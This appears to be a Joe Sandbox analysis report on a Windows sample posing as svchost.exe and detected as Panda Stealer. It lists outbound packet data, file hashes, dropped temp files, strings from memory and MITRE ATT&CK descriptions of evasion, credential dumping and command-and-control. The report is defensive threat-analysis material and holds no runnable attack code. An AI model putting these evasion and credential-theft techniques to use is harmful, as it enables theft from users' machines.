Jun 9, 2022 14:21:47.072422028 CEST	942	OUT	Data Raw: 59 88 69 93 36 d6 b8 af 36 cb 26 7a 1d e1 c6 b0 41 1f a2 3a 5d 8a ae 07 17 f6 7a ac 90 7e 5d 64 b6 1f bc 78 b7 8f 7a a4 9a c7 15 c7 00 f8 f2 d8 2f 18 1d 06 2e b7 9e f9 9a 1d 51 2e 37 5e c6 ad 4d c0 ea 0e 07 99 7f 1c 6c ef 46 79 68 af d4 fa d9 3f Data Ascii: Yi66&zA:]z~]dxz/.Q.7^MlFyh?6G<P-(4AQmckGT\|U,(7"d]cV\6YF/>}rHhiWEE\|!M&&QB4>QU?Q_E4~Is%q5dplO<
Jun 9, 2022 14:21:47.126946926 CEST	993	OUT	Data Raw: 83 b3 f6 4f e4 cb 42 d7 dc c1 1d f3 7e 98 57 24 bb 54 55 1f 7e 0b 76 bc 64 30 d8 53 2d 6b 34 c5 a3 fb 5c 5f 4e 25 23 60 38 30 b5 b9 5c c4 f9 66 f8 f3 a3 ae 99 b4 c4 fe 23 c6 d1 3e a1 5f 02 bc 53 c9 7d 8e e3 56 d2 ae d3 1b 82 26 a5 ad 04 a2 23 3c Data Ascii: OB~W$TU~vd0S-k4\_N%#`80\f#>_S}V&#<i64)S:8$y8M,I->@DWL+'Sm>-K)!H=%e[L=@wKkL#v&IqytmpTq3Q^*\@uC.
Jun 9, 2022 14:21:47.180716038 CEST	1073	OUT	Data Raw: 42 28 f7 c0 8c 07 0c 5c d1 fa 4a 5b a3 89 66 1e d9 f1 5e da 97 7f 35 d5 80 a5 81 71 9e 0e db 6b 52 f8 30 7d 91 d5 a1 04 44 c3 05 d9 1a 92 34 62 0d 00 88 11 c0 29 49 83 4a c2 9a 2b a5 66 f9 09 5e 79 7c 69 96 25 ea 82 49 92 37 e9 c6 73 61 1e 5f 91 Data Ascii: B(\J[f^5qkR0}D4b)IJ+f^y\|i%I7sa_ya{PP"o&GLEK)2cxMe?3 #2D@87v0Xg6L} xL6GRR<qfLH\|o01q1W)t-%r
Jun 9, 2022 14:21:47.180799007 CEST	1098	OUT	Data Raw: 82 12 a2 6c 67 7d 30 dd 38 a7 75 8f 06 97 ba 93 8e 28 fe 1e f2 e3 69 e0 c2 99 4f 99 46 94 2c d6 be 85 9a 27 3e 07 63 bb 3d 6f 5c 98 d0 6c 6c 2e 49 3a 68 40 de 23 80 a5 bd 5a 4e 90 5e a5 32 30 68 50 34 0a 3f e9 b0 b0 43 50 d3 34 a7 53 9d dd db 27 Data Ascii: lg}08u(iOF,'>c=o\ll.I:h@#ZN^20hP4?CP4S'y/M-M&%3U>[[-!s\|MpB.rnv&6})_O$asi_'IW+$yW-@3xu]r7,m1Ho}a)Ql
Jun 9, 2022 14:21:47.180949926 CEST	1116	OUT	Data Raw: 06 eb a9 13 da 0e cb 54 db fc e4 2c f4 1f 4a ab 18 70 61 19 4b b3 48 56 df 49 20 48 a3 f6 8b 4e 99 7f c2 c1 30 f1 90 8b 2a e2 c6 25 81 cc 70 5b 1c c9 2f ee f2 5d 09 85 c5 ce 6f c4 48 2f 2e 24 2c 53 f3 95 75 5d ef 7a b4 78 5f ee d8 e0 df dc 14 4b Data Ascii: T,JpaKHVI HN0*%p[/]oH/.$,Su]zx_KlOr4P5f\|@0Rb\|~i'9uY&6[vXmhue"<ap}kstso2sDXTAD%AJk<z5HoIg$u01![;4+
Jun 9, 2022 14:21:49.388959885 CEST	1937	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 09 Jun 2022 12:21:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Target ID:	0
Start time:	14:21:34
Start date:	09/06/2022
Path:	C:\Users\user\Desktop\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\svchost.exe"
Imagebase:	0xfd0000
File size:	1493328 bytes
MD5 hash:	F86AF47D52C3CD035C137D3A3097D06F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_PandaStealer, Description: Yara detected Panda Stealer, Source: 00000000.00000002.372379851.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42
Source: Joe Sandbox View	IP Address: 141.8.197.42 141.8.197.42

Source: svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: svchost.exe, 00000000.00000002.372473605.0000000001077000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000000.00000003.355554390.0000000009812000.00000004.00000800.00020000.00000000.sdmp, FYIQUMILOB.KCJREPTML.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Source: svchost.exe	Virustotal: Detection: 44%			Perma Link
Source: svchost.exe	ReversingLabs: Detection: 73%

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report svchost.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\FYIQUMILOB.KCJREPTML

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\KNWKGREDTLVCKPWLTLYN.PWSW

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\QOXMUS.LJGRXXYCOP

C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEE\YIIRISLGTNNQOCHOPCL.YLTETORRWUHKSJIX

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
svchost.exe